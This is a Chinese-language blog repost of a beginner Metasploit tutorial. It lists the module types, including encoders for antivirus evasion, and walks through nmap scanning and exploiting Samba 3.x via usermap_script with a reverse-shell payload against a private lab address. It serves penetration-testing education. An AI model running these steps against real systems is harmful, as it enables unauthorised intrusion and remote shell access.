Metasploit渗透攻击

Metasploit渗透攻击
源网址https://www.freebuf.com/column/194412.html
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。
0X01Metasploit功能模块
Auxiliaries(辅助模块):
负责执行扫描、嗅探、指纹识别、信息收集、口令猜测和Dos攻击等不会直接获得目
标主机权限的辅助渗透测试
Exploit(漏洞利用模块):
利用发现的安全漏洞或配置弱点对远程目标系统进行攻击的代码
Payload(攻击载荷模块):
攻击载荷是在渗透攻击成功后促使目标系统运行的一段植入代码
Post(后期渗透模块):
在取得目标系统远程监控权后,进行的如获取敏感信息、跳板攻击等操作
Encoders(编码工具模块):
免杀
Nop(空指令模块):
在渗透攻击构造恶意数据缓冲区时,常常要在真正要执行的Shellcode之前添加一段空指令区, 这样当触发渗透攻击后跳转执行ShellCode时,有一个较大的安全着陆区,从而避免受到内存 地址随机化、返回地址计算偏差等原因造成的ShellCode执行失败,提高渗透攻击的可靠性。
0X02Metasploit渗透攻击步骤
1. 扫描目标机系统,寻找可利用漏洞
Nessus
nmap -sV –script=nmap-vulners/vulscan.nse www.example.com
Metasploit使用search模块搜索可用端口扫描模
Metasploit中利用Nmap工具 msf>nmap -O -Pn/-p0 URI
2. 选择并配置漏洞利用模块
3. 选择并配置攻击载荷模块
4. 利用编码模块免杀
5. 渗透攻击
EX:使用辅助模块进行端口扫描
1.启动Metasploit
~ msfconsole
2.使用辅助模块进行端口扫描
search portscan
3.寻找合适的漏洞利用模块并使用
4.查看并修改参数
msf > use auxiliary/scanner/portscan/tcp
>show options
>set rhost 192.168.80.100
>set threads 20
>show options
5.利用漏洞Exploit
>exploit
EX:使用nmap扫描端口并利用漏洞
1.启动Metasploit
2.> nmap -sV 192.168.80.100
3.发现目标主机开启samba 3.X服务,寻找相应漏洞模块
> search samba
4.优先选择被标记为“Excellent”的模块,并查看描述信息
> use exploit/multi/samba/usermap_script
> info exploit/multi/samba/usermap_script
5.列举并选择攻击载荷模块
>show payloads
6.设置参数
> set payload cmd/unix/reverse
> show options
> exploit

太妙了
原文地址:https://www.cnblogs.com/luyinhai/p/11139320.html